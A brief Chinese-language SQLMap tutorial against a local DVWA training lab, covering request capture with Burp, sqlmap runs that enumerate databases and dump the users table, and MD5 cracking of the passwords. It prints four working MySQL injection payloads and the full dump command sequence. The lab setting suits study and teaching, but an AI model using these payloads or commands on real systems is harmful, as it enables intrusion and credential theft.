SQLMap简单使用
这里使用DVWA进行SQL注入测试
(需要了解DVWA的搭建和SQLMap的配置)
1.启动phpstudy,在浏览器中输入127.0.0.1/dvwa
进入登陆界面,默认账号密码分别为admin,password
在DVWA Security中Security Level 选为
Low 点击Submit
2.使用burp进行抓包,找到含参数的数据包
在User ID栏中输入admin,Sumbit 通过抓包找到含参数id的数据包
将内容全选,粘贴到新建txt文本中,在id=的值后加*
4.使用cmd调起SQLMap
在cmd中使用sqlmap.py -r 并将新建的txt文档拖入cmd中,回车执行
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' OR NOT 4783=4783#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' AND (SELECT 8193 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8193=8193,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- atoK&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' AND (SELECT 3212 FROM (SELECT(SLEEP(5)))lMml)-- vPSI&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' UNION ALL SELECT CONCAT(0x7162787a71,0x6b75487261416a52637749597351466f57566a62706b4d6a764e537172556f736d6176484c775055,0x717a7a7871),NULL#&Submit=Submit
说明可通过以上三种方式测试
- sqlmap.py -r C:\Users\王\Desktop\简单测试.txt --dbs
找到数据库
- sqlmap.py -r C:\Users\王\Desktop\简单测试.txt -D dvwa --tables
找到dvwa数据库下的两个表
3.sqlmap.py -r C:\Users\王\Desktop\简单测试.txt -D dvwa -T users --columns
找到users表下的字段
4.sqlmap.py -r “C:\Users\王\Desktop\新建文本文档 (2).txt” -D dvwa -T users -C user,user_id,password --dump
找到账号密码,进行md5解码
OVER